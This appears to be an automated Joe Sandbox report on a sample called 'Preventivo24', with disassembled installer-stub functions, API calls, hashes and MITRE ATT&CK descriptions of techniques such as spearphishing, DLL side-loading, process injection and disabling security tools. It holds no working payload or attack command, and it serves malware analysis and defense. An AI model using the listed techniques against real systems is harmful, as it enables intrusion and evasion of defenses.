Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ActiveWindow
String ID: User accepted to install a newer version.$User refused to install a newer version.
API String ID: 2558294473-4113633398
Opcode ID: bd312194c40ffb2e179e9fb3a4b5db5bae3217a3220de485a2a1a37f93a4453d
Instruction ID: 0f7548c2d41ffdc40b71eb0c98330c17cd21d88481758b427ab878f6dd1e9ca8
Opcode Fuzzy Hash: bd312194c40ffb2e179e9fb3a4b5db5bae3217a3220de485a2a1a37f93a4453d
Instruction Fuzzy Hash: 4F811331E006099FCB14DB68C85576EF7F1EF88324F18816CE919A7392DB35AD06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF6150 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010FA26F,000000FF), ref: 00FF630B
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010FA26F,000000FF), ref: 00FF63C4

Strings

<< Advanced Installer (x86) Log >>, xrefs: 00FF6263

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CloseCriticalDeleteHandleHeapProcessSection
String ID: << Advanced Installer (x86) Log >>
API String ID: 1977327082-396061572
Opcode ID: 76a27b91738cb5aac3a77e7fd92d76b8a06e402e6df89eaca3f693ac77a9adfd
Instruction ID: b013f35b6f6cde5f2e6ec8ef0aadee8539065eac10593923c9cb19d8f52b8c33
Opcode Fuzzy Hash: 76a27b91738cb5aac3a77e7fd92d76b8a06e402e6df89eaca3f693ac77a9adfd
Instruction Fuzzy Hash: EC71E030A05248DFCB19DF68C55476EBBF5FF48314F24826DE824A7382DB759A46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8E10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,B5580983,00000000,?,?,?,00FD877E,00000000), ref: 00FE8F68

Strings

\\?\, xrefs: 00FE8F75
Extraction path set to:, xrefs: 00FE8FCD

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Path
String ID: Extraction path set to:$\\?\
API String ID: 2875597873-2975605734
Opcode ID: 1febb85b8f3ee343b19513164abe25db2dc6cdbacc5c68fa851e023f7e976769
Instruction ID: 8c615cdda16e5b7fa0e83ad95d1e461bca4f7285b98f1371f7839dead21e6ff0
Opcode Fuzzy Hash: 1febb85b8f3ee343b19513164abe25db2dc6cdbacc5c68fa851e023f7e976769
Instruction Fuzzy Hash: 49611731A00659DFCB18DF68C844BAEF7B1FF44320F544259E929A7391DB35AD06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FAE210 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,B5580983), ref: 00FAE2B2

Strings

\\?\UNC\, xrefs: 00FAE2D9, 00FAE33A
\\?\, xrefs: 00FAE3AF, 00FAE3DA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Path
String ID: \\?\$\\?\UNC\
API String ID: 2875597873-3019864461
Opcode ID: 95e0f0447e8917157fb5f09440ea203f0437dddad4101e72c3194a69e0eda0f0
Instruction ID: 50e57c502109055e8ef496d9a01bcdbefa4e4bf0edee592ea19d79bd6f582f0d
Opcode Fuzzy Hash: 95e0f0447e8917157fb5f09440ea203f0437dddad4101e72c3194a69e0eda0f0
Instruction Fuzzy Hash: 8851D1B1E00204DBDB24DF68C845BAEBBF4FF59718F10861EE8556B241EBB16948CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01028E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

OpenEventW.KERNEL32(00000000,00000000,B5580983,_pbl_evt,00000008,?,?,0115B278,00000001,B5580983,?), ref: 01028EBE
CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 01028EDB

Strings

_pbl_evt, xrefs: 01028E92

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Event$CreateOpen
String ID: _pbl_evt
API String ID: 2335040897-4023232351
Opcode ID: d88fdfe9e83127cf02de1371b7dc90c0a33cc20eca45eee1359a37fcc1281f18
Instruction ID: 189eb64e855e793f5f05aee225639f1f1aa67de6a9bd46e98d024072444a3da0
Opcode Fuzzy Hash: d88fdfe9e83127cf02de1371b7dc90c0a33cc20eca45eee1359a37fcc1281f18
Instruction Fuzzy Hash: DD51B071D04618EFDB14DF68CD45BEEB7F8EB04710F10821AE865B7680EB746A04CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00FF77B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,80000002,B5580983,?,80000002,011D0080), ref: 00FF77EF
CreateDirectoryW.KERNEL32(80000002,00000000,?,80000002,011D0080), ref: 00FF7850

Strings

ADVINST_LOGS, xrefs: 00FF7828

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CreateDirectoryPathTemp
String ID: ADVINST_LOGS
API String ID: 2885754953-2492584244
Opcode ID: b9aeef73269ec096031f1b7e18840262d75281bb8a4309b06f16ce291fa9abe3
Instruction ID: c073ce2977785cafca0148a58470e195d8dd632f8c1b8d6e0c0da163ed3d1787
Opcode Fuzzy Hash: b9aeef73269ec096031f1b7e18840262d75281bb8a4309b06f16ce291fa9abe3
Instruction Fuzzy Hash: 9851C175D04219CACB30AF28C8487BAF3B4FF14764F2446AED995972A0EB754D81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF6F80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

WriteFile.KERNEL32(?,00000005,?,?,00000000,011456A4,00000002,?,00000000,CPU: ,00000005), ref: 00FF7071
FlushFileBuffers.KERNEL32(?), ref: 00FF707A

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

Strings

CPU: , xrefs: 00FF6FD8, 00FF6FEA, 00FF6FF4

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$BuffersFindFlushHeapProcessResourceWrite
String ID: CPU:
API String ID: 2793600070-1724696780
Opcode ID: 52814f4d92d5a848142dc845ff7f9c670ac1cc1252f3cee971a156ebae8052ce
Instruction ID: d71a94015ed1dbe34b774094831d6d1a14ce0366f4ab0f099e446676b36bab7f
Opcode Fuzzy Hash: 52814f4d92d5a848142dc845ff7f9c670ac1cc1252f3cee971a156ebae8052ce
Instruction Fuzzy Hash: 91418E31A006099BC714EBA8DD49BAEFBB5FF44320F144269E925A73D1DB35AD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00ECD750 Relevance: 5.3, APIs: 4, Instructions: 300memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,00000000), ref: 00ECD8C5
HeapFree.KERNEL32(00000000,?,00000000), ref: 00ECD8CB
GetProcessHeap.KERNEL32(?,00000000), ref: 00ECD95C
HeapFree.KERNEL32(00000000,?,00000000), ref: 00ECD962

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 37ffe8be71f5bc7fa14b4c2e3af040a9dfaba1bf5205342143112de11e5ef90d
Instruction ID: 07f1e6376813ddceb9a3a4f09a58c745568bca9021b39a4ed27ab249e7c45248
Opcode Fuzzy Hash: 37ffe8be71f5bc7fa14b4c2e3af040a9dfaba1bf5205342143112de11e5ef90d
Instruction Fuzzy Hash: 90C19C71D04219DFDB14DBA4CD44FAEBBB8BF48314F1041ADE415AB291DB76AD06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EAE869 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetParent.USER32(0000000F), ref: 00EAE89C

Strings

Unknown exception, xrefs: 00EAE871
C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00EAE881

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Parent
String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
API String ID: 975332729-9186675
Opcode ID: 5296ebd53f56f270d32ac3513b34e5a01300a53872a914ea0d0461b8f2f11f7c
Instruction ID: e6a0f9e2f13271e6fbd4ca2b2232a566cec6b20342193f80885166abc7d17e23
Opcode Fuzzy Hash: 5296ebd53f56f270d32ac3513b34e5a01300a53872a914ea0d0461b8f2f11f7c
Instruction Fuzzy Hash: 84014B30D0528CEEDB05EBE8CA197DDBFB1AB21304F544098E0457B292DBF45A48D792

Uniqueness

Uniqueness Score: -1.00%

Function 00E962F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00E96328

Strings

C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00E96313
Unknown exception, xrefs: 00E96300

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ActiveWindow
String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
API String ID: 2558294473-2631306498
Opcode ID: a1729b2f8a787cdc48fe061be4b9293613351c9722e02ff457544a3e6473d44d
Instruction ID: 8ce4bbba64d33d5c48b0303c520c83f4ff42eb89da222c6148184a5868ba1035
Opcode Fuzzy Hash: a1729b2f8a787cdc48fe061be4b9293613351c9722e02ff457544a3e6473d44d
Instruction Fuzzy Hash: 50F0CD30D0628CDADB05E7E9C9157CDBFB06B61704F545098E0457B286DBF40B08E792

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

